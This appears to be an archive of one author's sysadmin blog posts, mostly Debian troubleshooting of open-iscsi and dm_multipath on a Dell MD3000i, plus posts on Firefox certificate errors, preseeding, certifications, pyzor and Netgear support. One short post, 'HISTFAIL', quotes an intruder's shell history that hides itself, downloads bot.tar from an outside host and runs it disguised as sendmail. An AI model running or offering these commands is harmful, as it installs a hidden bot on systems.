Author Archives: btm

Secure Connection Failed

Secure Connection Failed
Hostname uses an invalid security certificate.
The certificate is only valid for *example.org
(Error code: ssl_error_bad_cert_domain)

Firefox 3 produces this error a lot for me. Mostly because I’m using local ssl sites by their hostname rather than their fqdn and the cert only has the fqdn in it. The solution is going to be setting up the hostname in apache as a separate site (servername) rather than a serveralias, and having a rewrite rule to send it to the full site. Of course I’ll need a bunch of code to autogenerate certificates I think, and sign them, which sounds like a terrible bore.

In the interim, the FF3 error is really tough, it’s a few clicks to get through it rather than formerly just being able to acknowledge as much and continue on. Setting ‘browser.xul.error_pages.expert_bad_cert‘ in ‘about:config’ to true helps a lot, as you don’t get the popup anymore and you just have to click ‘Add exception’ then ‘confirm security exception’.

preseeding with dbconfig-common

I’ve been playing around with a puppet recipe for ocsng and trying to get a preseed working that would create the database rather than debconf popping up with questions. This task had a number of difficulties.

1) Running the install by hand with apt-get never asked if I wanted to use another host for my mysql database. This is probably a bug, although I never tried changing my debconf priority level. because I eventually figured out from some source to use ‘method select tcp/ip’.

2) I started running into errors with debconf-set-selections erroring with ‘error: Cannot find a question for …’ Interestingly the only other place I saw this error was where someone was trying to do something similar with puppet and glpi in Puppet ticket #1213. I eventually found the series of events that caused this and how to work around them thanks to fjp and cjwatson (these two guys always seem to save my ass) giving me the right places to look. More about that in Debian bug #487300.

3) There isn’t an etch package for ocsng. Not a big deal, the lenny/testing packages don’t really have any new dependencies.

I thought there was something else, but maybe it was that easy. Here’s my seed file as an example:
ocsinventory-server ocsinventory-server/dbconfig-install boolean true
ocsinventory-server ocsinventory-server/mysql/admin-pass password supersecret
ocsinventory-server ocsinventory-server/mysql/method select tcp/ip
ocsinventory-server ocsinventory-server/mysql/app-pass password kindasecret
ocsinventory-server ocsinventory-server/remote/host select mysql01.example.org
ocsinventory-server ocsinventory-server/remote/newhost string mysql01.example.org
ocsinventory-server ocsinventory-server/database-type select mysql
ocsinventory-server ocsinventory-server/db/dbname string ocsweb

open source friendly

I was reading an article at The Register today about more yahoo executives quitting, specifically Joshua Schachter, the founder of delicious. The article includes a note about Jeremy Zawodny, who left Yahoo recently to sign on at craigstlist:

He said in a blog post yesterday: “Over the course of about three seconds, something clicked in my little brain, and I realised that Craigslist is a pretty unique combination of things: a small company with a solid financial base, a great service that I use myself, a focused group of people who really care about doing things well, and an open source-friendly environment.”

I’ve added the emphasis there. I was talking to a friend last night about how at lot of IT people, especially ones I know, are much more connected to the technology they use and communities around them than the actual product of their companies. I think I tend to keep that to myself as I feel most of the non technical people I work with are apt to confuse that as not caring about the company. Well, perhaps, but we care immensely about what we do, and you hired us to do what we do. How many 20% projects have turned into products? Executives of the world, are you listening?

debian, dell md3000i, dm_multipath and path checking

First, this article, albeit a little step by step and thus simple(?) at times, is really excellent. This article by Dell is worth reading as well as it uses a number of terms/concepts that may not be familiar to non-storage administrators.

On a couple earlier posts about dm_multipath (1, 2), ‘paul’ had commented “I see some errors in your configuration. The problem is that you are using readsector0 for path checking instead of RDAC and a wrong hwhandler.” He said following examples here worked in his situation, but didn’t elaborate on what his situation was exactly. That article/benchmark says:

After trying the array successfully with Fedora Core 5, CentOS5 (which is RHEL 5 64bit) and exploring all the above issues, in the end I settled on SuSE SLES-10-SP1 x86_64 (Suse 10 service pack 1 for 64bit) and used it as-is, there was no need to install anything other than the Java “SMdevices/SMmonitor/SMagent” stuff on the resource CD.

It’s work noting that those are all RPM based distributions. No surprise since Dell appears to support them in some way although as usual, YMMV with any enterprise support. ‘paul’ failed to say why configuring dm_multipath this way is a configuration error, so I set out to read more. It’s important to make the distinction between the MD3000 in that article and the MD3000i which I have.

The MD3000 is traditional Direct-Attached-Storage (DAS) and uses SAS 8470 cables to connect to SAS HBAs in the host. In Highly-Available (HA) mode, you put two HBAs in each of two hosts and connect one HBA in each host to one of the two controllers in the MD3000.

The MD3000i is an iSCSI Storage-Area-Network (SAN) and uses regular gigabit ethernet to interconnect to up to 16 hosts. It’s recommend to use two separate switches and two network cards per host, creating multiple physical paths to each controller on the MD3000i.

My brain had trouble for a while separating DRAC (Dell Remote Access Controller), which is IPMI like Dell kit from RDAC (Redundant Disk Array Controller ). The benchmark article mentions that the MD3000i is an awful lot like an IBM DS4100. Dell likes rebranding gear, so maybe the MD3000i is just an IBM N3700 or something (I don’t have enough interest to poke through that data sheets). I mention it though because RDAC is a technology in a lot of IBMs products so you can sometimes find more information search for ‘IBM RDAC’ than Dell.

When I boot up, I only have two paths to a virtual disk:

# multipath -d -ll
sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Which is across the active controller. If I switch the preferred path in MDSM the disk fails:

# ls
ls: reading directory .: Input/output error
# multipath -d -ll
sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

Running multipath once picks up the other paths:

# multipath
error calling out /sbin/scsi_id -g -u -s /block/sda
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
reload: 36001c23000d59fc600000284478bcdca DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 1:0:0:0 sdb 8:16 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 4:0:0:0 sdc 8:32 [undef][ready]
\_ round-robin 0 [prio=0][undef]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][undef]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

# multipath -d -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][enabled]
\_ 1:0:0:0 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:0 sdc 8:32 [active][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [active][faulty]

If I now remount the filesystem and change the preferred path back, things work okay. You can see device-mapper failing the paths in the dmesg output:

end_request: I/O error, dev sdb, sector 794703
device-mapper: multipath: Failing path 8:16.
end_request: I/O error, dev sdb, sector 71
end_request: I/O error, dev sdb, sector 8279
end_request: I/O error, dev sdb, sector 12375
end_request: I/O error, dev sdb, sector 794711
end_request: I/O error, dev sdc, sector 794703
device-mapper: multipath: Failing path 8:32.
end_request: I/O error, dev sdc, sector 794711
end_request: I/O error, dev sdc, sector 71
end_request: I/O error, dev sdc, sector 8279
end_request: I/O error, dev sdc, sector 12375

But touching some files and switching again, things went down hill:

device-mapper: multipath: Failing path 8:48.
end_request: I/O error, dev sde, sector 12735
device-mapper: multipath: Failing path 8:64.
Buffer I/O error on device dm-1, logical block 1586
lost page write due to I/O error on dm-1
Aborting journal on device dm-1.
Buffer I/O error on device dm-1, logical block 1027
lost page write due to I/O error on dm-1

And I ended up with a read only filesystem. Running multipath dry shows that all that paths have failed, more specifically the standby paths did not come active:

# multipath -d -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][enabled]
\_ 1:0:0:0 sdb 8:16 [failed][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:0 sdc 8:32 [failed][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

Futzing around a bit they would, obviously a unacceptable failure for the design. I noticed lenny, which has 2.6.24 instead of 2.6.18 has the rdac modules:

linux-image-2.6.24-1-686: /lib/modules/2.6.24-1-686/kernel/drivers/md/dm-rdac.ko
multipath-tools: /sbin/mpath_prio_rdac

# multipath
/proc/misc: No entry for device-mapper found
Is device-mapper driver missing from kernel?
Failure to communicate with kernel device-mapper driver.
/proc/misc: No entry for device-mapper found
Is device-mapper driver missing from kernel?
Failure to communicate with kernel device-mapper driver.
Incompatible libdevmapper 1.02.25 (2008-04-10)(compat) and kernel driver

# modprobe dm_mod
# multipath
DM multipath kernel driver not loaded

# modprobe dm-multipath
# multipath
error calling out /lib/udev/scsi_id -g -u -s /block/sda
create: 36001e4f0003968c60000000000000000 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 2:0:0:31 sdc 8:32 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 3:0:0:31 sde 8:64 [undef][ready]
create: 36001c23000d59fc60000000000000000 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 1:0:0:31 sdb 8:16 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 4:0:0:31 sdd 8:48 [undef][ready]
# multipath -d -ll
36001c23000d59fc60000000000000000dm-1 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 1:0:0:31 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:31 sdd 8:48 [active][ready]
36001e4f0003968c60000000000000000dm-0 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:31 sdc 8:32 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:31 sde 8:64 [active][ready]

The kicker here is seeing ‘size=20M’ which gives away that we’re only seeing the access partition. I had logged in before adding the host to virtual disk mapping so I ran ‘iscsiadm -m session -R’ to rescan the disks and then ‘multipath -F’ to flush the mapping to the access partition. Still not getting the disks:

sd 1:0:0:31: [sdb] Unit Not Ready
sd 1:0:0:31: [sdb] Sense Key : Illegal Request [current]
sd 1:0:0:31: [sdb] Add. Sense: Logical unit not supported
sd 1:0:0:31: [sdb] READ CAPACITY failed
sd 1:0:0:31: [sdb] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE,SUGGEST_OK
sd 1:0:0:31: [sdb] Sense Key : Illegal Request [current]
sd 1:0:0:31: [sdb] Add. Sense: Logical unit not supported
sd 1:0:0:31: [sdb] Write Protect is off
sd 1:0:0:31: [sdb] Mode Sense: 0b 00 10 08
sd 1:0:0:31: [sdb] Got wrong page
sd 1:0:0:31: [sdb] Assuming drive cache: write through

I logged out and back in (iscsiadm -m node -u ; iscsiadm -m node -l) and the disks showed up:

# multipath
error calling out /lib/udev/scsi_id -g -u -s /block/sda
sdc: checker msg is “directio checker reports path is down”
sdd: checker msg is “directio checker reports path is down”
reload: 36001c23000d59fc600000284478bcdca DELL ,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][undef]
\_ 5:0:0:0 sdc 8:32 [undef][faulty]
\_ round-robin 0 [prio=1][undef]
\_ 6:0:0:0 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=0][undef]
\_ 8:0:0:0 sdd 8:48 [undef][faulty]
\_ round-robin 0 [prio=1][undef]
\_ 7:0:0:0 sde 8:64 [active][ready]

Swapping the preferred path around basically required running multipath each time so it would detect that the paths had changed. Running multipath is the job of multipathd so I checked and saw it hadn’t been started by installing multipath-tools, so I started it (/etc/init.d/multipath-tools start), after which I had no I/O problems touching and rm’ing files on the filesystem while swapping back and forth the preferred path in MDSM.

I created /etc/multipath.conf, based from here:

devices {
        device {
                vendor                  DELL
                product                 MD3000i
                hardware_handler        "1 rdac"
                path_checker            rdac
                path_grouping_policy    group_by_prio
                prio_callout            "/sbin/mpath_prio_rdac /dev/%n"
                failback                immediate
                getuid_callout          "/lib/udev/scsi_id -g -u -s /block/%n"
        }
}
multipaths {
        mulitpath {
                device {
                        vendor DELL
                        product MD3000i
                }
        }
}

And then reset up multipath:

# /etc/init.d/multipath-tools restart
Stopping multipath daemon: multipathd.
Starting multipath daemon: multipathd.
# multipath -F
libdevmapper: libdm-common.c(374): Removed /dev/mapper/36001c23000d59fc600000284478bcdca-part1
libdevmapper: libdm-common.c(374): Removed /dev/mapper/36001c23000d59fc600000284478bcdca

# multipath -ll
36001c23000d59fc600000284478bcdcadm-0 DELL    ,MD3000i
[size=558G][features=0][hwhandler=1 rdac]
\_ round-robin 0 [prio=6][active]
\_ 5:0:0:0 sdc 8:32  [active][ready]
\_ 8:0:0:0 sdd 8:48  [active][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdb 8:16  [active][ghost]
\_ 7:0:0:0 sde 8:64  [active][ghost]

Flipping the preferred path this way, I saw a lot less I/O errors in the dmesg output. I’m still not sure what the RDAC path checker does exactly, but it appears to work cleaner.

Linux certifications and releases

Every once in a while I head over to CertCities to see if they’ve finally gotten around to another Hottest Certs for xxxx, which we haven’t seen one since 12/2005 or certification salary surveys which have fallen behind the times as well. I collect certifications now and then. Initially I picked up a bunch of Microsoft certifications to get a foot hold on the Seattle market after moving here. Now they’re not so important because I work for startups where Microsoft comprehension is essential, but challenges lie elsewhere, mostly in Open Source. A while back I went and got an LPIC-1 and LPIC-2, feeling like I should have a Linux certification but didn’t have the time or money for the RHCE lab, or any respect for the CompTIA Linux+. I got an email from LPI today for a survey they’re conducting about where LPI should go from here, which made me head back to CertCities and I found a number of recent articles by Emmett Dulaney about Linux that made me send him a couple of emails.

One, “Pondering Ubuntu 8.04“, subtitled “Did the few minor tweaks included in the latest version of Ubuntu actually warrant a new release? Emmett’s not so sure.” is about how the lack of new features in hardy doesn’t justify the release. It misses every point of the release cycle, and even comments about how everyone hated Microsoft for making regular releases. Well, because we had to pay for them each time, maybe?

To the folks that think upgrading from Server 2000 to Server 2003 is good because it’s new, you simply present Ubuntu as 7.10 and 8.04. When interacting with colleagues we usually refer to releases by short name such as ‘gutsy’ or ‘hardy’, which allows interjecting debian releases like ‘etch’ and ‘lenny’ without having to specify the distribution explicitly.

Of course a suitable reason for 8.04 enough is the release cycle. Debian has an amazing framework but releases are slow. Debian etch was initially released in 2007-04 and we’re hoping that lenny will be out this year, but we’ll see. Just yesterday I had to back port packages from lenny to etch because each release gets security updates, not version updates, so you have to wait for the next release for the version updates or go through the trouble of doing the backport yourself.

One might question why backport a deb package when you can simply install the new software and the answer is one of configuration management. Whenever I inherit a network full of linux systems I have to try to figure out what software was installed where. There are many instances where the same software will have been installed as different versions by different people over the years and it’s difficult to tell which is being used. Packaging solves this because (slotting aside) there’s one version installed and you can use packaging software to tell exactly what files belong to that package and
where they are.

While this may not seem of immediate benefit to a single user, it is because it’s essential to troubleshooting user problems for those that provide support, in the case of Ubuntu, mostly for free.

While Hardy may not have any visually apparent and stunning changes, I assure you there are lots of updates behind the desktop that are well worth the appreciation.

The other was, “Linux Certs and the Cutting Edge“, subtitled “Some certifications seem stuck in the Dark Ages. Plus, Book of the Week toes the command line.” This article goes on to talk about how “df, du, kill, ls, mv, rm, tar, umask, vi and so on” are on all the tests and offers that it’s because of the “commonality between the distributions”, not because these are all essential utilities. Anyways, here’s my email:

CompTIA is always a terrible example of certifications because it’s so entry level. I can’t complain a whole lot because it’s respected and besides questions that I consider obscure to my job roles (like fixing laser printers) it’s pretty easy to pass the tests.

“df, du, kill, ls, mv, rm, tar, umask, vi and so on”

These are all -essential-. I would never hire someone who failed to explain exactly what each of these tools does. I feel like LPI certifications may be a little overboard because they expect you to know what certain flags do for each command, when you can always look them up in the man page. But knowing the difference between tar -z and tar -j is always a good thing.

For example though, we have a fairly complex configuration employing debian linux hosting and as a guest on vmware-server, with configuration management by puppet with git, and capistrano for system administration. While someone with experience with these things is good, the following is a piece of a puppet recipe I wrote:

# set linux clock algorithm
# non rescue (single) kernel lines in grub config that don’t have a clock algorithm set get set to pit
# best to run this regularly (this will run everytime) so that new kernel installs get this added
# there is the edge case that a kernel is upgraded and we don’t wait for puppet to run before the reboot
exec { “set-vmware-clock”:
command => “/bin/sed -ie ‘/clock\|single/! s/^kernel.*/& clocksource=pit/ ‘ /boot/grub/menu.lst”,
onlyif => “/bin/grep ‘^kernel’ /boot/grub/menu.lst | /bin/grep -v ‘single’ | /bin/grep -v ‘clock'”,
}

If someone can’t look at that and tell me what it does, they’re not getting hired here. They don’t need to know so much about puppet, that they can figure out, even just by looking at the recipe you get a good idea of what the puppet portion of the configuration is for. But if you’re not familiar with standard tools, you’re not going to get much done, regardless of how much you may know about something like puppet. If you look at that and know that ‘grep’ returns a line of text, but don’t know that ‘-v’ makes it exclude that line, you’re going to miss the point of that recipe.

The key isn’t that these tools are distribution neutral, giving you a lot of common ground. The key is that these tools are extremely powerful provided you know how to use them. The more you familiarize yourself with them, the more you can chain them together and make more powerful solutions.

HISTFAIL

  494  unset HISTIFLE
495  w
496  ps x
497  ls
498  rm -rf piata
499  wget www.f-dic.com/bot.tar ; tar xzvf bot.tar ; rm -rf bot.tar ; mv bot root-uscreens ; chmod 700 root-uscreens ; cd root-uscreens ; PATH=.:$PATH ; mv bash sendmail ; cp sendmail [sendmail] ; [sendmail]

a box got ssh left open on it. I like the ‘HISTIFLE’ part. irc bots? this feels so much 1995. bot.tar comes with pico though, just in case you can’t use vi!

automatic open-iscsi volume mounting on debian etch

This is a continuation of my work on getting open-iscsi working on etch and then getting dm_multipath working.

Note that I have the pass column in the fstab set to 0 so the system won’t fail to boot when fstab can’t find this partition early in the boot process; this is important.

I started off trying to use _netdev as a mount option. I verified in ‘/etc/init.d/mountall.sh’ that debian does use mount -a -O no_netdev to avoid mounting network devices before networking is up, but while watching the startup (vmware is great for this) I saw it was still trying to mount early in the boot process anyways, and the UUID wasn’t there yet, of course, since iscsi and networking weren’t there yet.

I took a look in the initrd (‘mkdir /tmp/initrd ; cd /tmp/initrd ; cat /boot/initrd.img-`uname -r` | cpio -idmv’) in search of where it reads the fstab to see if that was the same case and saw that ‘scripts/local-top/iscsi’ definitely was trying to get iscsi things done. It’s worth noting this may not have been there if I hadn’t recreated my initrd recently in my last post. I recalled seeing some notes about root on iscsi in ‘/usr/share/doc/open-iscsi/README.Debian’ (comes with the open-iscsi deb).

Someone I got an additional node that produced an error about failing to log in since it already existed. I stopped the open-iscsi init script and removed the corresponding folder in the /etc/iscsi/nodes/ tree, then restarted open-iscsi. It caught my eye that this script reported ‘Mounting network filesystems’ so I looked in the script and on line 102 saw ‘mount -a -O _netdev’ to mount lines tagged with the ‘_netdev’ option. On reviewing my fstab I saw I had two mounts, one commended out using /dev/dm-1 and the other not commented out using the UUID. The UUID mount was using ‘defaults’ while the devmapper mount was using ‘_netdev’. I switched the UUID mount to use the _netdev option, rebooted and saw my filesystem mounted. I ran ‘rm /etc/iscsi/iscsi.initramfs’ to rensure that my onboot initramfs work didn’t make a difference and it was confirmed.

The trick is simply to set your fstab up using the UUID (use ‘blkid’ to get it), options set to ‘_netdev’ and pass set to ‘0’:

UUID=8d070de0-403c-4669-9db0-5b17e3aeebc5 /mnt ext3 _netdev 0 0

Of course the ext3 partition won’t get fscked on startup, but that’s just the filesystem I was using for testing. The ultimate goal is to use GFS or OCFS or something to create an iscsi volume fronted by NFS on multiple servers.

So the open-iscsi init.d script actually does the mounting that finally works. This is mentioned in this group thread, although it’s worth noting that I set ‘node.startup = automatic’ and left ‘node.conn[0].startup = manual’ on each node. I don’t know what the difference is. In response to this later thread, I did not have to use an extra script.

dm_multipath and open-iscsi on debian etch

So I got open-iscsi working on debian, in so much that I had four disks, two to the ‘preferred controller’ were good but the two to the second controller weren’t. Switching the preferred controller

After installing multipath-tools I started looking at dmsetup but the target types listed in the man page: linear, striped and error, didn’t make sense. When I read the INTRO file included in the debian package I saw there were additional types snapshot and mirror. This thread clued me in to there being a multipath type.

Running ‘multipath -v 3 -ll’ provided some more information that made things click in my head. Running ‘blkid’ produced:

/dev/mapper/36001c23000d59fc600000284478bcdca1: UUID=”8d070de0-403c-4669-9db0-5b17e3aeebc5″ SEC_TYPE=”ext2″ TYPE=”ext3″
/dev/sda1: UUID=”742239f4-b6fe-4422-b1a2-5639e5ab4675″ SEC_TYPE=”ext2″ TYPE=”ext3″
/dev/sda5: TYPE=”swap”

The mapper device was created by running multipath and seemed to figure bits out on it’s own such that running just ‘multipath -ll’ would show the paths that were and were not working (thats a different problem).

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sdb 8:16 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdc 8:32 [active][faulty]
\_ round-robin 0 [prio=1][active]
\_ 4:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 5:0:0:0 sde 8:64 [active][ready]

For a while I was getting ‘mount: no such partition found’ when trying to mount by the UUID shown by ‘blkid’. It just stopped while I was researching the problem. The man page for mount indicates it needs access to /proc/partitions but I saw nothing related to UUID’s in there or elsewhere poking around /proc. I noticed there was a correct symlink in /dev/disk/by-uuid, so I rebooted the machine and checked again and it was gone. ‘iscsiadm -m session’ confirmed no sessions but ‘iscsiadm -m node’ had the nodes cached so I ran ‘iscsiadm -m node -L all’ to login again and verified the sessions again. I looked in /dev/disk/by-uuid and the uuid had shown up again. multipathd was running at startup so I figure it got things going again.

Interestingly, ‘multipath -ll’ only showed

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Changing the preferred path made the disks go down and the dm faulty:

root@file01:/mnt# multipath -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48  [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64  [failed][faulty]

Running ‘multipath’ added the other two block devices again and I remounted ok.  This time the filesystem stayed happy when I changed the preferred path. I’m willing to suspect that you can only access a virtual disk via one controller at a time, although from either interface on that controller. That is, you can only access it on the second controller when the first one fails or you manually change the preferred path. The work is just getting everything set up so that it works on startup. What’s missing appears to be getting the iscsi login and then the multipath to include all disks, then your normal automount in fstab.

‘iscsiadm -m node -o show’ reports ‘node.startup = manual’ which is also set in /etc/iscsid.conf and /etc/iscsi/iscsid.conf. I ran ‘iscsiadm -m node -o update -n node.startup -v automatic’. Rebooting saw the login automatically firing.

Putting the UUID or /dev/dm-1 in the fstab wasn’t working. Watching the console it was obvious it was trying to mount the partition before the multipath stuff ran. Per ‘/usr/share/doc/multipath-tools-initramfs/README.Debian’ in the ‘multipath-tools-initramfs’ package I ran ‘update-initramfs -t -c -v -k `uname -r`’.

On reboot I saw “FATAL: Module dm_multipath not found.” While multipath may have been part of the problem, it seems like even with _netdev as a mount option the device is trying to be mounted before the open-iscsi daemon runs. I’ll leave that problem and post for another day; tomorrow if I’m lucky and nothing breaks.

pyzor: check failed: no response

~# spamassassin -D pyzor < ~abuse/Maildir/new/1211380929.V801Ic04fM701311.mx2
[12963] dbg: pyzor: network tests on, attempting Pyzor
[12963] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12963] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12963MwNYaWtmp
[12963] dbg: pyzor: [12964] finished: exit=0x0100
[12963] dbg: pyzor: check failed: no response
[12963] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

The no response seemed bad. However:

# wget http://www200.pair.com/mecham/spam/sample-spam.txt
# spamassassin -D pyzor <sample-spam.txt
[12961] dbg: pyzor: network tests on, attempting Pyzor
[12961] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12961] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12961WKN9Tptmp
[12961] dbg: pyzor: got response: 82.94.255.100:24441 (200, ‘OK’) 82 0
[12961] dbg: pyzor: listed: COUNT=82/5 WHITELIST=0
[12961] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

So actually I’m figuring Pyzor is working fine (this is with spamassassin installed via package on debian etch and use_pyzor 1 in local.cf). Got the idea from here.

iscsi on debian etch with open-iscsi and a dell md3000i initial notes

I had some problems using the debian open-iscsi package to connect to the md3000i on debian etch; both package versions 2.0.869.2-2 and 2.0.730-1etch1. A couple folks on the open-iscsi list pointed out there were problems with the kernel modules, so I compiled those from the open-iscsi source and diverted the debian modules. Details are here on the list.

Most open-iscsi documentation is in the README.

# iscsiadm -m discovery –type sendtargets –portal 10.0.9.10 -P 1
Target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a
Portal: 10.0.9.12:3260,2
Iface Name: default
Portal: 10.0.9.11:3260,1
Iface Name: default
Portal: 10.0.9.10:3260,1
Iface Name: default
Portal: 10.0.9.13:3260,2
Iface Name: default

The MD3000i has two controllers each with one out of band management port and two iscsi ports which can be seen above.  When logging in, it grabs all the disks mapped as seperate devices. I removed the ‘access’ mapping which is that odd 16/20mb partition. Notes about that are deep in here, and I remember Dell telling me it wasn’t really needed on the Windows server either.

# iscsiadm -m node -l
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]: successful

It logs in to each portal interface. I guess you use dm_multipath to hook them all back together, but I haven’t gotten that far.

 # cat /proc/partitions
major minor  #blocks  name

8     0    3145728 sda
8     1    2947896 sda1
8     2          1 sda2
8     5     192748 sda5
8    16  584888320 sdb
8    17  584886456 sdb1
8    32  584888320 sdc
8    33  584886456 sdc1
8    48  584888320 sdd
8    64  584888320 sde

sd[b-e] are the same disk, through each portal. You’ll notice it only shows a partition on two of the four, that’s the controller that is the “preferred path”. If we switch the preferred controller, the disks that are usable switch to the other pair. Again, I’m assumimg dm_multipath will clean that up.

netgear support fail

I’ve been trying to deal with a linux appliance’s memory problems for a while, here, and here. Because Netgear/Infrant’s build system removes binaries post-dpkg, it’s not really a full system and I sort of gave up debugging when I kept running into missing binaries (like strace). Some good people helped out (Thanks Mike Fedyk) but I went and opened a trouble ticket with netgear hoping to get to talk to an actual developer on the thing. They must exist somewhere, I can’t imagine netgear let them all go when they bought infrant or anything.

1) Netgear’s support site is terrible. There is not a ‘support.netgear.com, go to the knowledge base. Support is achieved through product registration of all places under online support submissions (6).

2) The Readynas people have a nice forum, and it’s product specific. There’s a blog and everything, which is cool. But my thread stopped getting responses from them last week. No “I don’t know” or anything, just stopped responding to me.

3) So I opened the ticket with Netgear, and they respond with:

The Hardware Compatibility List Memory list/page http://www.readynas.com/?page_id=83

It’s the only guideline we have and if it’s not on the list its not supported nor with the scope of support we provide.

You question is already in the best place for an answer. The moderators are will pass all applicable data to the engineering staff as needed.

Totally in response to like, my first post of the thread, somehow ignoring the rest of it. In a hurry, fine.

4) I reply saying there’s a problem with the product and I need escalation. Escalation closes my ticket and responds with:

The forum where are posting is run by our Engineering Team. For your reference, the members of our team use Star Wars (TM) type names. Considering the kind of issue that you are having, you will have to correspond with them, as we at NETGEAR Level 1 and Level 2 Support cannot assist you with this type of issue.

We appreciate your patience and understanding.

The implication that I still have patience at this point is nice of them, however totally wrong.

Outlook 2007 Crash, junk mail filters / imf?

This is a fun one, by fun I mean I just got to spend 6 hours on it sans lunch.

Outlook 2007 crashing on startup on Vista.

Log Name: Application
Source: Application Error
Date: 5/14/2008 12:09:46 PM
Event ID: 1000
Task Category: (100)
Level: Error
Keywords: Classic
User: N/A
Computer: vistabob

Description:
